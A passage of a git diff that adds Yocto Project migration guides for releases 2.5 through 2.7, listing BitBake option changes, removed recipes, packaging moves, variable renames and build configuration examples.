+   previously shipped with poky but not in OpenEmbedded-Core have been
+   removed. These scripts are not maintained and are outdated. In many
+   cases, they are also limited in scope. The
+   ``bitbake-layers create-layer`` command is a direct replacement for
+   ``yocto-layer``. See the documentation to create a BSP or kernel
+   recipe in the ":ref:`bsp-guide/bsp:bsp kernel recipe example`" section.
+
+-  ``devtool finish``: ``devtool finish`` now exits with an error if
+   there are uncommitted changes or a rebase/am in progress in the
+   recipe's source repository. If this error occurs, there might be
+   uncommitted changes that will not be included in updates to the
+   patches applied by the recipe. A -f/--force option is provided for
+   situations that the uncommitted changes are inconsequential and you
+   want to proceed regardless.
+
+-  ``scripts/oe-setup-rpmrepo`` script: The functionality of
+   ``scripts/oe-setup-rpmrepo`` is replaced by
+   ``bitbake package-index``.
+
+-  ``scripts/test-dependencies.sh`` script: The script is largely made
+   obsolete by the recipe-specific sysroots functionality introduced in
+   the previous release.
+
+.. _migration-2.5-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following are BitBake changes:
+
+-  The ``--runall`` option has changed. There are two different
+   behaviors people might want:
+
+   -  *Behavior A:* For a given target (or set of targets) look through
+      the task graph and run task X only if it is present and will be
+      built.
+
+   -  *Behavior B:* For a given target (or set of targets) look through
+      the task graph and run task X if any recipe in the taskgraph has
+      such a target, even if it is not in the original task graph.
+
+   The ``--runall`` option now performs "Behavior B". Previously
+   ``--runall`` behaved like "Behavior A". A ``--runonly`` option has
+   been added to retain the ability to perform "Behavior A".
+
+-  Several explicit "run this task for all recipes in the dependency
+   tree" tasks have been removed (e.g. ``fetchall``, ``checkuriall``,
+   and the ``*all`` tasks provided by the ``distrodata`` and
+   ``archiver`` classes). There is a BitBake option to complete this for
+   any arbitrary task. For example:
+   ::
+
+      bitbake <target> -c fetchall
+
+   should now be replaced with:
+   ::
+
+      bitbake <target> --runall=fetch
+
+.. _migration-2.5-python-and-python3-changes:
+
+Python and Python 3 Changes
+---------------------------
+
+The following are auto-packaging changes to Python and Python 3:
+
+The script-managed ``python-*-manifest.inc`` files that were previously
+used to generate Python and Python 3 packages have been replaced with a
+JSON-based file that is easier to read and maintain. A new task is
+available for maintainers of the Python recipes to update the JSON file
+when upgrading to new Python versions. You can now edit the file
+directly instead of having to edit a script and run it to update the
+file.
+
+One particular change to note is that the Python recipes no longer have
+build-time provides for their packages. This assumes ``python-foo`` is
+one of the packages provided by the Python recipe. You can no longer run
+``bitbake python-foo`` or have a
+:term:`DEPENDS` on ``python-foo``,
+but doing either of the following causes the package to work as
+expected: ::
+
+   IMAGE_INSTALL_append = " python-foo"
+
+or ::
+
+   RDEPENDS_${PN} = "python-foo"
+
+The earlier build-time provides behavior was a quirk of the
+way the Python manifest file was created. For more information on this
+change please see :yocto_git:`this commit
+</cgit/cgit.cgi/poky/commit/?id=8d94b9db221d1def42f091b991903faa2d1651ce>`.
+
+.. _migration-2.5-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following are additional changes:
+
+-  The ``kernel`` class supports building packages for multiple kernels.
+   If your kernel recipe or ``.bbappend`` file mentions packaging at
+   all, you should replace references to the kernel in package names
+   with ``${KERNEL_PACKAGE_NAME}``. For example, if you disable
+   automatic installation of the kernel image using
+   ``RDEPENDS_kernel-base = ""`` you can avoid warnings using
+   ``RDEPENDS_${KERNEL_PACKAGE_NAME}-base = ""`` instead.
+
+-  The ``buildhistory`` class commits changes to the repository by
+   default so you no longer need to set ``BUILDHISTORY_COMMIT = "1"``.
+   If you want to disable commits you need to set
+   ``BUILDHISTORY_COMMIT = "0"`` in your configuration.
+
+-  The ``beaglebone`` reference machine has been renamed to
+   ``beaglebone-yocto``. The ``beaglebone-yocto`` BSP is a reference
+   implementation using only mainline components available in
+   OpenEmbedded-Core and ``meta-yocto-bsp``, whereas Texas Instruments
+   maintains a full-featured BSP in the ``meta-ti`` layer. This rename
+   avoids the previous name clash that existed between the two BSPs.
+
+-  The ``update-alternatives`` class no longer works with SysV ``init``
+   scripts because this usage has been problematic. Also, the
+   ``sysklogd`` recipe no longer uses ``update-alternatives`` because it
+   is incompatible with other implementations.
+
+-  By default, the :ref:`cmake <ref-classes-cmake>` class uses
+   ``ninja`` instead of ``make`` for building. This improves build
+   performance. If a recipe is broken with ``ninja``, then the recipe
+   can set ``OECMAKE_GENERATOR = "Unix Makefiles"`` to change back to
+   ``make``.
+
+-  The previously deprecated ``base_*`` functions have been removed in
+   favor of their replacements in ``meta/lib/oe`` and
+   ``bitbake/lib/bb``. These are typically used from recipes and
+   classes. Any references to the old functions must be updated. The
+   following table shows the removed functions and their replacements:
+
+   +------------------------------+----------------------------------------------------------+
+   | *Removed*                    | *Replacement*                                            |
+   +==============================+==========================================================+
+   | base_path_join()             | oe.path.join()                                           |
+   +------------------------------+----------------------------------------------------------+
+   | base_path_relative()         | oe.path.relative()                                       |
+   +------------------------------+----------------------------------------------------------+
+   | base_path_out()              | oe.path.format_display()                                 |
+   +------------------------------+----------------------------------------------------------+
+   | base_read_file()             | oe.utils.read_file()                                     |
+   +------------------------------+----------------------------------------------------------+
+   | base_ifelse()                | oe.utils.ifelse()                                        |
+   +------------------------------+----------------------------------------------------------+
+   | base_conditional()           | oe.utils.conditional()                                   |
+   +------------------------------+----------------------------------------------------------+
+   | base_less_or_equal()         | oe.utils.less_or_equal()                                 |
+   +------------------------------+----------------------------------------------------------+
+   | base_version_less_or_equal() | oe.utils.version_less_or_equal()                         |
+   +------------------------------+----------------------------------------------------------+
+   | base_contains()              | bb.utils.contains()                                      |
+   +------------------------------+----------------------------------------------------------+
+   | base_both_contain()          | oe.utils.both_contain()                                  |
+   +------------------------------+----------------------------------------------------------+
+   | base_prune_suffix()          | oe.utils.prune_suffix()                                  |
+   +------------------------------+----------------------------------------------------------+
+   | oe_filter()                  | oe.utils.str_filter()                                    |
+   +------------------------------+----------------------------------------------------------+
+   | oe_filter_out()              | oe.utils.str_filter_out() (or use the \_remove operator) |
+   +------------------------------+----------------------------------------------------------+
+
+-  Using ``exit 1`` to explicitly defer a postinstall script until first
+   boot is now deprecated since it is not an obvious mechanism and can
+   mask actual errors. If you want to explicitly defer a postinstall to
+   first boot on the target rather than at ``rootfs`` creation time, use
+   ``pkg_postinst_ontarget()`` or call
+   ``postinst_intercept delay_to_first_boot`` from ``pkg_postinst()``.
+   Any failure of a ``pkg_postinst()`` script (including ``exit 1``)
+   will trigger a warning during ``do_rootfs``.
+
+   For more information, see the
+   ":ref:`dev-manual/dev-manual-common-tasks:post-installation scripts`"
+   section in the Yocto Project Development Tasks Manual.
+
+-  The ``elf`` image type has been removed. This image type was removed
+   because the ``mkelfimage`` tool that was required to create it is no
+   longer provided by coreboot upstream and required updating every time
+   ``binutils`` updated.
+
+-  Support for .iso image compression (previously enabled through
+   ``COMPRESSISO = "1"``) has been removed. The userspace tools
+   (``zisofs-tools``) are unmaintained and ``squashfs`` provides better
+   performance and compression. In order to build a live image with
+   squashfs+lz4 compression enabled you should now set
+   ``LIVE_ROOTFS_TYPE = "squashfs-lz4"`` and ensure that ``live`` is in
+   ``IMAGE_FSTYPES``.
+
+-  Recipes with an unconditional dependency on ``libpam`` are only
+   buildable with ``pam`` in ``DISTRO_FEATURES``. If the dependency is
+   truly optional then it is recommended that the dependency be
+   conditional upon ``pam`` being in ``DISTRO_FEATURES``.
+
+-  For EFI-based machines, the bootloader (``grub-efi`` by default) is
+   installed into the image at /boot. Wic can be used to split the
+   bootloader into separate boot and rootfs partitions if necessary.
+
+-  Patches whose context does not match exactly (i.e. where patch
+   reports "fuzz" when applying) will generate a warning. For an example
+   of this see `this
+   commit <http://git.yoctoproject.org/cgit/cgit.cgi/poky/commit/?id=cc97bc08125b63821ce3f616771830f77c456f57>`__.
+
+-  Layers are expected to set ``LAYERSERIES_COMPAT_layername`` to match
+   the version(s) of OpenEmbedded-Core they are compatible with. This is
+   specified as codenames using spaces to separate multiple values (e.g.
+   "rocko sumo"). If a layer does not set
+   ``LAYERSERIES_COMPAT_layername``, a warning will is shown. If a layer
+   sets a value that does not include the current version ("sumo" for
+   the 2.5 release), then an error will be produced.
+
+-  The ``TZ`` environment variable is set to "UTC" within the build
+   environment in order to fix reproducibility problems in some recipes.
+
+
diff --git a/documentation/ref-manual/migration-2.6.rst b/documentation/ref-manual/migration-2.6.rst
new file mode 100644
index 0000000000..2f0da48ab6
--- /dev/null
+++ b/documentation/ref-manual/migration-2.6.rst
@@ -0,0 +1,457 @@
+Moving to the Yocto Project 2.6 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.6 Release from the prior release.
+
+.. _migration-2.6-gcc-changes:
+
+GCC 8.2 is Now Used by Default
+------------------------------
+
+The GNU Compiler Collection version 8.2 is now used by default for
+compilation. For more information on what has changed in the GCC 8.x
+release, see https://gcc.gnu.org/gcc-8/changes.html.
+
+If you still need to compile with version 7.x, GCC 7.3 is also provided.
+You can select this version by setting the and can be selected by
+setting the :term:`GCCVERSION` variable to "7.%" in
+your configuration.
+
+.. _migration-2.6-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- *beecrypt*: No longer needed since moving to RPM 4.
+- *bigreqsproto*: Replaced by ``xorgproto``.
+- *calibrateproto*: Removed in favor of ``xinput``.
+- *compositeproto*: Replaced by ``xorgproto``.
+- *damageproto*: Replaced by ``xorgproto``.
+- *dmxproto*: Replaced by ``xorgproto``.
+- *dri2proto*: Replaced by ``xorgproto``.
+- *dri3proto*: Replaced by ``xorgproto``.
+- *eee-acpi-scripts*: Became obsolete.
+- *fixesproto*: Replaced by ``xorgproto``.
+- *fontsproto*: Replaced by ``xorgproto``.
+- *fstests*: Became obsolete.
+- *gccmakedep*: No longer used.
+- *glproto*: Replaced by ``xorgproto``.
+- *gnome-desktop3*: No longer needed. This recipe has moved to ``meta-oe``.
+- *icon-naming-utils*: No longer used since the Sato theme was removed in 2016.
+- *inputproto*: Replaced by ``xorgproto``.
+- *kbproto*: Replaced by ``xorgproto``.
+- *libusb-compat*: Became obsolete.
+- *libuser*: Became obsolete.
+- *libnfsidmap*: No longer an external requirement since ``nfs-utils`` 2.2.1. ``libnfsidmap`` is now integrated.
+- *libxcalibrate*: No longer needed with ``xinput``
+- *mktemp*: Became obsolete. The ``mktemp`` command is provided by both ``busybox`` and ``coreutils``.
+- *ossp-uuid*: Is not being maintained and has mostly been replaced by ``uuid.h`` in ``util-linux``.
+- *pax-utils*: No longer needed. Previous QA tests that did use this recipe are now done at build time.
+- *pcmciautils*: Became obsolete.
+- *pixz*: No longer needed. ``xz`` now supports multi-threaded compression.
+- *presentproto*: Replaced by ``xorgproto``.
+- *randrproto*: Replaced by ``xorgproto``.
+- *recordproto*: Replaced by ``xorgproto``.
+- *renderproto*: Replaced by ``xorgproto``.
+- *resourceproto*: Replaced by ``xorgproto``.
+- *scrnsaverproto*: Replaced by ``xorgproto``.
+- *trace-cmd*: Became obsolete. ``perf`` replaced this recipe's functionally.
+- *videoproto*: Replaced by ``xorgproto``.
+- *wireless-tools*: Became obsolete. Superseded by ``iw``.
+- *xcmiscproto*: Replaced by ``xorgproto``.
+- *xextproto*: Replaced by ``xorgproto``.
+- *xf86dgaproto*: Replaced by ``xorgproto``.
+- *xf86driproto*: Replaced by ``xorgproto``.
+- *xf86miscproto*: Replaced by ``xorgproto``.
+- *xf86-video-omapfb*: Became obsolete. Use kernel modesetting driver instead.
+- *xf86-video-omap*: Became obsolete. Use kernel modesetting driver instead.
+- *xf86vidmodeproto*: Replaced by ``xorgproto``.
+- *xineramaproto*: Replaced by ``xorgproto``.
+- *xproto*: Replaced by ``xorgproto``.
+- *yasm*: No longer needed since previous usages are now satisfied by ``nasm``.
+
+.. _migration-2.6-packaging-changes:
+
+Packaging Changes
+-----------------
+
+The following packaging changes have been made:
+
+-  *cmake*: ``cmake.m4`` and ``toolchain`` files have been moved to
+   the main package.
+
+-  *iptables*: The ``iptables`` modules have been split into
+   separate packages.
+
+-  *alsa-lib*: ``libasound`` is now in the main ``alsa-lib`` package
+   instead of ``libasound``.
+
+-  *glibc*: ``libnss-db`` is now in its own package along with a
+   ``/var/db/makedbs.sh`` script to update databases.
+
+-  *python and python3*: The main package has been removed from
+   the recipe. You must install specific packages or ``python-modules``
+   / ``python3-modules`` for everything.
+
+-  *systemtap*: Moved ``systemtap-exporter`` into its own package.
+
+.. _migration-2.6-xorg-protocol-dependencies:
+
+XOrg Protocol dependencies
+--------------------------
+
+The ``*proto`` upstream repositories have been combined into one
+"xorgproto" repository. Thus, the corresponding recipes have also been
+combined into a single ``xorgproto`` recipe. Any recipes that depend
+upon the older ``*proto`` recipes need to be changed to depend on the
+newer ``xorgproto`` recipe instead.
+
+For names of recipes removed because of this repository change, see the
+`Removed Recipes <#removed-recipes>`__ section.
+
+.. _migration-2.6-distutils-distutils3-fetching-dependencies:
+
+``distutils`` and ``distutils3`` Now Prevent Fetching Dependencies During the ``do_configure`` Task
+---------------------------------------------------------------------------------------------------
+
+Previously, it was possible for Python recipes that inherited the
+:ref:`distutils <ref-classes-distutils>` and
+:ref:`distutils3 <ref-classes-distutils3>` classes to fetch code
+during the :ref:`ref-tasks-configure` task to satisfy
+dependencies mentioned in ``setup.py`` if those dependencies were not
+provided in the sysroot (i.e. recipes providing the dependencies were
+missing from :term:`DEPENDS`).
+
+.. note::
+
+   This change affects classes beyond just the two mentioned (i.e.
+   ``distutils`` and ``distutils3``). Any recipe that inherits ``distutils*``
+   classes are affected. For example, the ``setuptools`` and ``setuptools3``
+   recipes are affected since they inherit the ``distutils*`` classes.
+
+Fetching these types of dependencies that are not provided in the
+sysroot negatively affects the ability to reproduce builds. This type of
+fetching is now explicitly disabled. Consequently, any missing
+dependencies in Python recipes that use these classes now result in an
+error during the ``do_configure`` task.
+
+.. _migration-2.6-linux-yocto-configuration-audit-issues-now-correctly-reported:
+
+``linux-yocto`` Configuration Audit Issues Now Correctly Reported
+-----------------------------------------------------------------
+
+Due to a bug, the kernel configuration audit functionality was not
+writing out any resulting warnings during the build. This issue is now
+corrected. You might notice these warnings now if you have a custom
+kernel configuration with a ``linux-yocto`` style kernel recipe.
+
+.. _migration-2.6-image-kernel-artifact-naming-changes:
+
+Image/Kernel Artifact Naming Changes
+------------------------------------
+
+The following changes have been made:
+
+-  Name variables (e.g. :term:`IMAGE_NAME`) use a new
+   ``IMAGE_VERSION_SUFFIX`` variable instead of
+   :term:`DATETIME`. Using ``IMAGE_VERSION_SUFFIX``
+   allows easier and more direct changes.
+
+   The ``IMAGE_VERSION_SUFFIX`` variable is set in the ``bitbake.conf``
+   configuration file as follows:
+   ::
+
+      IMAGE_VERSION_SUFFIX = "-${DATETIME}"
+
+-  Several variables have changed names for consistency:
+   ::
+
+      Old Variable Name             New Variable Name
+      ========================================================
+      KERNEL_IMAGE_BASE_NAME        KERNEL_IMAGE_NAME
+      KERNEL_IMAGE_SYMLINK_NAME     KERNEL_IMAGE_LINK_NAME
+      MODULE_TARBALL_BASE_NAME      MODULE_TARBALL_NAME
+      MODULE_TARBALL_SYMLINK_NAME   MODULE_TARBALL_LINK_NAME
+      INITRAMFS_BASE_NAME           INITRAMFS_NAME
+
+-  The ``MODULE_IMAGE_BASE_NAME`` variable has been removed. The module
+   tarball name is now controlled directly with the
+   :term:`MODULE_TARBALL_NAME` variable.
+
+-  The :term:`KERNEL_DTB_NAME` and
+   :term:`KERNEL_DTB_LINK_NAME` variables
+   have been introduced to control kernel Device Tree Binary (DTB)
+   artifact names instead of mangling ``KERNEL_IMAGE_*`` variables.
+
+-  The :term:`KERNEL_FIT_NAME` and
+   :term:`KERNEL_FIT_LINK_NAME` variables
+   have been introduced to specify the name of flattened image tree
+   (FIT) kernel images similar to other deployed artifacts.
+
+-  The :term:`MODULE_TARBALL_NAME` and
+   :term:`MODULE_TARBALL_LINK_NAME`
+   variable values no longer include the "module-" prefix or ".tgz"
+   suffix. These parts are now hardcoded so that the values are
+   consistent with other artifact naming variables.
+
+-  Added the :term:`INITRAMFS_LINK_NAME`
+   variable so that the symlink can be controlled similarly to other
+   artifact types.
+
+-  :term:`INITRAMFS_NAME` now uses
+   "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}" instead
+   of "${PV}-${PR}-${MACHINE}-${DATETIME}", which makes it consistent
+   with other variables.
+
+.. _migration-2.6-serial-console-deprecated:
+
+``SERIAL_CONSOLE`` Deprecated
+-----------------------------
+
+The :term:`SERIAL_CONSOLE` variable has been
+functionally replaced by the
+:term:`SERIAL_CONSOLES` variable for some time.
+With the Yocto Project 2.6 release, ``SERIAL_CONSOLE`` has been
+officially deprecated.
+
+``SERIAL_CONSOLE`` will continue to work as before for the 2.6 release.
+However, for the sake of future compatibility, it is recommended that
+you replace all instances of ``SERIAL_CONSOLE`` with
+``SERIAL_CONSOLES``.
+
+.. note::
+
+   The only difference in usage is that ``SERIAL_CONSOLES``
+   expects entries to be separated using semicolons as compared to
+   ``SERIAL_CONSOLE``, which expects spaces.
+
+.. _migration-2.6-poky-sets-unknown-configure-option-to-qa-error:
+
+Configure Script Reports Unknown Options as Errors
+--------------------------------------------------
+
+If the configure script reports an unknown option, this now triggers a
+QA error instead of a warning. Any recipes that previously got away with
+specifying such unknown options now need to be fixed.
+
+.. _migration-2.6-override-changes:
+
+Override Changes
+----------------
+
+The following changes have occurred:
+
+-  The ``virtclass-native`` and ``virtclass-nativesdk`` Overrides Have
+   Been Removed: The ``virtclass-native`` and ``virtclass-nativesdk``
+   overrides have been deprecated since 2012 in favor of
+   ``class-native`` and ``class-nativesdk``, respectively. Both
+   ``virtclass-native`` and ``virtclass-nativesdk`` are now dropped.
+
+   .. note::
+
+      The ``virtclass-multilib-`` overrides for multilib are still valid.
+
+-  The ``forcevariable`` Override Now Has a Higher Priority Than
+   ``libc`` Overrides: The ``forcevariable`` override is documented to
+   be the highest priority override. However, due to a long-standing
+   quirk of how :term:`OVERRIDES` is set, the ``libc``
+   overrides (e.g. ``libc-glibc``, ``libc-musl``, and so forth)
+   erroneously had a higher priority. This issue is now corrected.
+
+   It is likely this change will not cause any problems. However, it is
+   possible with some unusual configurations that you might see a change
+   in behavior if you were relying on the previous behavior. Be sure to
+   check how you use ``forcevariable`` and ``libc-*`` overrides in your
+   custom layers and configuration files to ensure they make sense.
+
+-  The ``build-${BUILD_OS}`` Override Has Been Removed: The
+   ``build-${BUILD_OS}``, which is typically ``build-linux``, override
+   has been removed because building on a host operating system other
+   than a recent version of Linux is neither supported nor recommended.
+   Dropping the override avoids giving the impression that other host
+   operating systems might be supported.
+
+-  The "_remove" operator now preserves whitespace. Consequently, when
+   specifying list items to remove, be aware that leading and trailing
+   whitespace resulting from the removal is retained.
+
+   See the ":ref:`bitbake:removing-override-style-syntax`"
+   section in the BitBake User Manual for a detailed example.
+
+.. _migration-2.6-systemd-configuration-now-split-out-to-system-conf:
+
+``systemd`` Configuration is Now Split Into ``systemd-conf``
+------------------------------------------------------------
+
+The configuration for the ``systemd`` recipe has been moved into a
+``system-conf`` recipe. Moving this configuration to a separate recipe
+avoids the ``systemd`` recipe from becoming machine-specific for cases
+where machine-specific configurations need to be applied (e.g. for
+``qemu*`` machines).
+
+Currently, the new recipe packages the following files:
+::
+
+   ${sysconfdir}/machine-id
+   ${sysconfdir}/systemd/coredump.conf
+   ${sysconfdir}/systemd/journald.conf
+   ${sysconfdir}/systemd/logind.conf
+   ${sysconfdir}/systemd/system.conf
+   ${sysconfdir}/systemd/user.conf
+
+If you previously used bbappend files to append the ``systemd`` recipe to
+change any of the listed files, you must do so for the ``systemd-conf``
+recipe instead.
+
+.. _migration-2.6-automatic-testing-changes:
+
+Automatic Testing Changes
+-------------------------
+
+This section provides information about automatic testing changes:
+
+-  ``TEST_IMAGE`` Variable Removed: Prior to this release, you set the
+   ``TEST_IMAGE`` variable to "1" to enable automatic testing for
+   successfully built images. The ``TEST_IMAGE`` variable no longer
+   exists and has been replaced by the
+   :term:`TESTIMAGE_AUTO` variable.
+
+-  Inheriting the ``testimage`` and ``testsdk`` Classes: Best
+   practices now dictate that you use the
+   :term:`IMAGE_CLASSES` variable rather than the
+   :term:`INHERIT` variable when you inherit the
+   :ref:`testimage <ref-classes-testimage*>` and
+   :ref:`testsdk <ref-classes-testsdk>` classes used for automatic
+   testing.
+
+.. _migration-2.6-openssl-changes:
+
+OpenSSL Changes
+---------------
+
+`OpenSSL <https://www.openssl.org/>`__ has been upgraded from 1.0 to
+1.1. By default, this upgrade could cause problems for recipes that have
+both versions in their dependency chains. The problem is that both
+versions cannot be installed together at build time.
+
+.. note::
+
+   It is possible to have both versions of the library at runtime.
+
+.. _migration-2.6-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The server logfile ``bitbake-cookerdaemon.log`` is now always placed in
+the :term:`Build Directory` instead of the current
+directory.
+
+.. _migration-2.6-security-changes:
+
+Security Changes
+----------------
+
+The Poky distribution now uses security compiler flags by default.
+Inclusion of these flags could cause new failures due to stricter
+checking for various potential security issues in code.
+
+.. _migration-2.6-post-installation-changes:
+
+Post Installation Changes
+-------------------------
+
+You must explicitly mark post installs to defer to the target. If you
+want to explicitly defer a postinstall to first boot on the target
+rather than at rootfs creation time, use ``pkg_postinst_ontarget()`` or
+call ``postinst_intercept delay_to_first_boot`` from ``pkg_postinst()``.
+Any failure of a ``pkg_postinst()`` script (including exit 1) triggers
+an error during the :ref:`ref-tasks-rootfs` task.
+
+For more information on post-installation behavior, see the
+":ref:`dev-manual/dev-manual-common-tasks:post-installation scripts`"
+section in the Yocto Project Development Tasks Manual.
+
+.. _migration-2.6-python-3-profile-guided-optimizations:
+
+Python 3 Profile-Guided Optimization
+------------------------------------
+
+The ``python3`` recipe now enables profile-guided optimization. Using
+this optimization requires a little extra build time in exchange for
+improved performance on the target at runtime. Additionally, the
+optimization is only enabled if the current
+:term:`MACHINE` has support for user-mode emulation in
+QEMU (i.e. "qemu-usermode" is in
+:term:`MACHINE_FEATURES`, which it is by
+default).
+
+If you wish to disable Python profile-guided optimization regardless of
+the value of ``MACHINE_FEATURES``, then ensure that
+:term:`PACKAGECONFIG` for the ``python3`` recipe
+does not contain "pgo". You could accomplish the latter using the
+following at the configuration level:
+::
+
+   PACKAGECONFIG_remove_pn-python3 = "pgo"
+
+Alternatively, you can set ``PACKAGECONFIG`` using an append file
+for the ``python3`` recipe.
+
+.. _migration-2.6-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes occurred:
+
+-  Default to using the Thumb-2 instruction set for armv7a and above. If
+   you have any custom recipes that build software that needs to be
+   built with the ARM instruction set, change the recipe to set the
+   instruction set as follows:
+   ::
+
+      ARM_INSTRUCTION_SET = "arm"
+
+-  ``run-postinsts`` no longer uses ``/etc/*-postinsts`` for
+   ``dpkg/opkg`` in favor of built-in postinst support. RPM behavior
+   remains unchanged.
+
+-  The ``NOISO`` and ``NOHDD`` variables are no longer used. You now
+   control building ``*.iso`` and ``*.hddimg`` image types directly by
+   using the :term:`IMAGE_FSTYPES` variable.
+
+-  The ``scripts/contrib/mkefidisk.sh`` has been removed in favor of
+   Wic.
+
+-  ``kernel-modules`` has been removed from
+   :term:`RRECOMMENDS` for ``qemumips`` and
+   ``qemumips64`` machines. Removal also impacts the ``x86-base.inc``
+   file.
+
+   .. note::
+
+      ``genericx86`` and ``genericx86-64`` retain ``kernel-modules`` as part of
+      the ``RRECOMMENDS`` variable setting.
+
+-  The ``LGPLv2_WHITELIST_GPL-3.0`` variable has been removed. If you
+   are setting this variable in your configuration, set or append it to
+   the ``WHITELIST_GPL-3.0`` variable instead.
+
+-  ``${ASNEEDED}`` is now included in the
+   :term:`TARGET_LDFLAGS` variable directly. The
+   remaining definitions from ``meta/conf/distro/include/as-needed.inc``
+   have been moved to corresponding recipes.
+
+-  Support for DSA host keys has been dropped from the OpenSSH recipes.
+   If you are still using DSA keys, you must switch over to a more
+   secure algorithm as recommended by OpenSSH upstream.
+
+-  The ``dhcp`` recipe now uses the ``dhcpd6.conf`` configuration file
+   in ``dhcpd6.service`` for IPv6 DHCP rather than re-using
+   ``dhcpd.conf``, which is now reserved for IPv4.
+
+
diff --git a/documentation/ref-manual/migration-2.7.rst b/documentation/ref-manual/migration-2.7.rst
new file mode 100644
index 0000000000..7e628fc3ec
--- /dev/null
+++ b/documentation/ref-manual/migration-2.7.rst
@@ -0,0 +1,180 @@
+Moving to the Yocto Project 2.7 Release
+=======================================
+
+This section provides migration information for moving to the Yocto
+Project 2.7 Release from the prior release.
+
+.. _migration-2.7-bitbake-changes:
+
+BitBake Changes
+---------------
+
+The following changes have been made to BitBake:
+
+-  BitBake now checks anonymous Python functions and pure Python
+   functions (e.g. ``def funcname:``) in the metadata for tab
+   indentation. If found, BitBake produces a warning.
+
+-  Bitbake now checks
+   :term:`BBFILE_COLLECTIONS` for duplicate
+   entries and triggers an error if any are found.
+
+.. _migration-2.7-eclipse-support-dropped:
+
+Eclipse Support Removed
+-----------------------
+
+Support for the Eclipse IDE has been removed. Support continues for
+those releases prior to 2.7 that did include support. The 2.7 release
+does not include the Eclipse Yocto plugin.
+
+.. _migration-2.7-qemu-native-splits-system-and-user-mode-parts:
+
+``qemu-native`` Splits the System and User-Mode Parts
+-----------------------------------------------------
+
+The system and user-mode parts of ``qemu-native`` are now split.
+``qemu-native`` provides the user-mode components and
+``qemu-system-native`` provides the system components. If you have
+recipes that depend on QEMU's system emulation functionality at build
+time, they should now depend upon ``qemu-system-native`` instead of
+``qemu-native``.
+
+.. _migration-2.7-upstream-tracking.inc-removed:
+
+The ``upstream-tracking.inc`` File Has Been Removed
+---------------------------------------------------
+
+The previously deprecated ``upstream-tracking.inc`` file is now removed.
+Any ``UPSTREAM_TRACKING*`` variables are now set in the corresponding
+recipes instead.
+
+Remove any references you have to the ``upstream-tracking.inc`` file in
+your configuration.
+
+.. _migration-2.7-distro-features-libc-removed:
+
+The ``DISTRO_FEATURES_LIBC`` Variable Has Been Removed
+------------------------------------------------------
+
+The ``DISTRO_FEATURES_LIBC`` variable is no longer used. The ability to
+configure glibc using kconfig has been removed for quite some time
+making the ``libc-*`` features set no longer effective.
+
+Remove any references you have to ``DISTRO_FEATURES_LIBC`` in your own
+layers.
+
+.. _migration-2.7-license-values:
+
+License Value Corrections
+-------------------------
+
+The following corrections have been made to the
+:term:`LICENSE` values set by recipes:
+
+- *socat*: Corrected ``LICENSE`` to be "GPLv2" rather than "GPLv2+".
+- *libgfortran*: Set license to "GPL-3.0-with-GCC-exception".
+- *elfutils*: Removed "Elfutils-Exception" and set to "GPLv2" for shared libraries
+
+.. _migration-2.7-packaging-changes:
+
+Packaging Changes
+-----------------
+
+This section provides information about packaging changes.
+
+-  ``bind``: The ``nsupdate`` binary has been moved to the
+   ``bind-utils`` package.
+
+-  Debug split: The default debug split has been changed to create
+   separate source packages (i.e. package_name\ ``-dbg`` and
+   package_name\ ``-src``). If you are currently using ``dbg-pkgs`` in
+   :term:`IMAGE_FEATURES` to bring in debug
+   symbols and you still need the sources, you must now also add
+   ``src-pkgs`` to ``IMAGE_FEATURES``. Source packages remain in the
+   target portion of the SDK by default, unless you have set your own
+   value for :term:`SDKIMAGE_FEATURES` that
+   does not include ``src-pkgs``.
+
+-  Mount all using ``util-linux``: ``/etc/default/mountall`` has moved
+   into the -mount sub-package.
+
+-  Splitting binaries using ``util-linux``: ``util-linux`` now splits
+   each binary into its own package for fine-grained control. The main
+   ``util-linux`` package pulls in the individual binary packages using
+   the :term:`RRECOMMENDS` and
+   :term:`RDEPENDS` variables. As a result, existing
+   images should not see any changes assuming
+   :term:`NO_RECOMMENDATIONS` is not set.
+
+-  ``netbase/base-files``: ``/etc/hosts`` has moved from ``netbase`` to
+   ``base-files``.
+
+-  ``tzdata``: The main package has been converted to an empty meta
+   package that pulls in all ``tzdata`` packages by default.
+
+-  ``lrzsz``: This package has been removed from
+   ``packagegroup-self-hosted`` and
+   ``packagegroup-core-tools-testapps``. The X/Y/ZModem support is less
+   likely to be needed on modern systems. If you are relying on these
+   packagegroups to include the ``lrzsz`` package in your image, you now
+   need to explicitly add the package.
+
+.. _migration-2.7-removed-recipes:
+
+Removed Recipes
+---------------
+
+The following recipes have been removed:
+
+- *gcc*: Drop version 7.3 recipes. Version 8.3 now remains.
+- *linux-yocto*: Drop versions 4.14 and 4.18 recipes. Versions 4.19 and 5.0 remain.
+- *go*: Drop version 1.9 recipes. Versions 1.11 and 1.12 remain.
+- *xvideo-tests*: Became obsolete.
+- *libart-lgpl*: Became obsolete.
+- *gtk-icon-utils-native*: These tools are now provided by gtk+3-native
+- *gcc-cross-initial*: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
+- *gcc-crosssdk-initial*: No longer needed. gcc-cross/gcc-crosssdk is now used instead.
+- *glibc-initial*: Removed because the benefits of having it for site_config are currently outweighed by the cost of building the recipe.
+
+.. _migration-2.7-removed-classes:
+
+Removed Classes
+---------------
+
+The following classes have been removed:
+
+- *distutils-tools*: This class was never used.
+- *bugzilla.bbclass*: Became obsolete.
+- *distrodata*: This functionally has been replaced by a more modern tinfoil-based implementation.
+
+.. _migration-2.7-miscellaneous-changes:
+
+Miscellaneous Changes
+---------------------
+
+The following miscellaneous changes occurred:
+
+-  The ``distro`` subdirectory of the Poky repository has been removed
+   from the top-level ``scripts`` directory.
+
+-  Perl now builds for the target using
+   `perl-cross <http://arsv.github.io/perl-cross/>`_ for better
+   maintainability and improved build performance. This change should
+   not present any problems unless you have heavily customized your Perl
+   recipe.
+
+-  ``arm-tunes``: Removed the "-march" option if mcpu is already added.
+
+-  ``update-alternatives``: Convert file renames to
+   :term:`PACKAGE_PREPROCESS_FUNCS`
+
+-  ``base/pixbufcache``: Obsolete ``sstatecompletions`` code has been
